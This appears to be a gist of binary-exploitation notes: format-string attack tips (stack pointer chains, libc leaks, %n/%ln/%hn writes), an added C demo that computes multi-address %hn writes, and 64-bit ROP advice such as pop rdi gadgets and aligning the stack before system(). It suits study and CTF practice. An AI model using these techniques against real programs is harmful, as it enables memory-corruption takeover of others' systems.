@Enigmatrix
Last active June 11, 2017 09:25

Types of Attack

  1. Stack overflow
  2. Heap overflow
  3. Format String
  4. NULL byte / Off by one

Format String Attack Tips

  1. Look at the registers/stack: one of the slots will almost always hold a pointer to another slot on the stack (a saved frame pointer, for example). Writing through the first slot with %<k>$n changes what the second slot points to, and writing through the second slot then hits any address you chose, so this gives an arbitrary read/write without needing your own buffer on the stack.
  2. Look at the registers/stack: one of them will hold a pointer into libc (e.g. main's return address into __libc_start_main). Leaking it gives the libc base, which defeats ASLR for the library.
  3. %n stores an int (4 bytes) and leaves the upper bytes of an 8-byte slot untouched; %ln stores a long (8 bytes on x86-64), so a small count written with %ln also zeroes the bytes after the value.
  4. Writing to two addresses in one format string is risky but doable: use %hn (2-byte writes), order the writes by increasing value, and pad each one with "%<width>c"; when the next value is not above the running count, add 0x10000 to the padding, since %hn keeps only the low 16 bits.
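Added example, not from the gist: a C program that exercises the write mechanics behind tips 1, 3 and 4 with the target pointers handed to printf explicitly, so it runs deterministically instead of depending on the victim's stack layout (in a real bug the same slots are picked with %<k>$n). Function names such as write_with_n, fmt_write64 and write_via_pointer_chain are mine; it assumes a little-endian LP64 target (x86-64 Linux) and glibc's behaviour that snprintf keeps counting padding for %n even when it truncates.

```c
#include <stdio.h>
#include <stdint.h>

/* Added example (not the gist's code): %n / %ln / %hn write mechanics.
 * Assumes a little-endian LP64 target such as x86-64 Linux. */

/* snprintf keeps counting the padding for %n even when it truncates, so the
 * writes can be done without flooding stdout. */
static char scratch[16];

/* Tip 3: %n stores an int, %ln stores a long.  A small count written with
 * %n leaves the upper four bytes of an 8-byte slot alone; %ln clears them. */
uint64_t write_with_n(uint64_t initial, int count)
{
    uint64_t slot = initial;
    snprintf(scratch, sizeof scratch, "%*c%n", count, 'A', (int *)&slot);
    return slot;
}

uint64_t write_with_ln(uint64_t initial, int count)
{
    uint64_t slot = initial;
    snprintf(scratch, sizeof scratch, "%*c%ln", count, 'A', (long *)&slot);
    return slot;
}

/* Tip 4: several writes in one format string.  Each %hn stores the low 16
 * bits of the running character count, so the value is split into 2-byte
 * chunks, the chunks are sorted ascending (least padding), and each one is
 * padded with "%*c".  A chunk that is not above the running count gets an
 * extra 0x10000 of padding, which the 16-bit store wraps away. */
void fmt_write64(uint64_t *dst, uint64_t value)
{
    short *half = (short *)dst;          /* little-endian 2-byte chunks */
    unsigned chunk[4];
    int order[4] = {0, 1, 2, 3};
    for (int i = 0; i < 4; i++)
        chunk[i] = (unsigned)(value >> (16 * i)) & 0xffff;
    for (int i = 1; i < 4; i++) {        /* insertion sort of indices */
        int k = order[i], j = i;
        while (j > 0 && chunk[order[j - 1]] > chunk[k]) {
            order[j] = order[j - 1];
            j--;
        }
        order[j] = k;
    }
    int width[4];
    unsigned count = 0;                  /* running count mod 0x10000 */
    for (int i = 0; i < 4; i++) {
        unsigned w = (chunk[order[i]] - count) & 0xffff;
        if (w == 0)
            w = 0x10000;                 /* %c always emits at least one char */
        width[i] = (int)w;
        count = (count + w) & 0xffff;
    }
    snprintf(scratch, sizeof scratch, "%*c%hn%*c%hn%*c%hn%*c%hn",
             width[0], 'A', &half[order[0]], width[1], 'A', &half[order[1]],
             width[2], 'A', &half[order[2]], width[3], 'A', &half[order[3]]);
}

uint64_t fmt_write64_demo(void)
{
    uint64_t target = 0;
    fmt_write64(&target, 0x00007f1234ab0010ULL);
    return target;                       /* 0x00007f1234ab0010 */
}

/* Tip 1: a stack slot Q reachable through another stack slot P.  Stage one
 * writes through P to turn Q into a pointer to the real target; stage two
 * writes through Q.  Here P is &q and Q's contents are passed explicitly. */
int write_via_pointer_chain(int value)
{
    int target = 0;
    uint64_t q = 0;                                   /* Q, initially junk */
    fmt_write64(&q, (uint64_t)(uintptr_t)&target);    /* P -> Q := &target */
    snprintf(scratch, sizeof scratch, "%*c%n",        /* Q -> target := value */
             value, 'A', (int *)(uintptr_t)q);
    return target;
}

int main(void)
{
    printf("%%n   : %016llx\n", (unsigned long long)write_with_n(0xdeadbeefcafebabeULL, 0x41));
    printf("%%ln  : %016llx\n", (unsigned long long)write_with_ln(0xdeadbeefcafebabeULL, 0x41));
    printf("4x%%hn: %016llx\n", (unsigned long long)fmt_write64_demo());
    printf("chain: %d\n", write_via_pointer_chain(1337));
    return 0;
}
```

Against a real target the explicit pointer arguments become positional selectors (%<k>$hn for the slot at argument index k) and the computed widths become literal "%<width>c" padding in the attacker-controlled string; the sorting and the 0x10000 wrap are what make a multi-address write in one string safe regardless of the order of the values.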

64bit tips

  1. On Linux (System V AMD64 ABI) integer and pointer parameters go in registers first, then on the stack: RDI, RSI, RDX, RCX, R8, R9, then the stack; floating-point parameters go in XMM0..XMM7, then the stack. (Syscalls use the same order except that R10 replaces RCX; Windows x64 uses RCX, RDX, R8, R9 instead.)
  2. To set these registers, ROP through gadgets such as pop rdi; ret (likewise pop rsi; ret, pop rdx; ret, ...), placing the value right after the gadget address on the stack. Keep the stack 16-byte aligned before calling into libc functions such as system(), inserting a lone ret gadget if needed, or SSE instructions (movaps) inside libc will fault.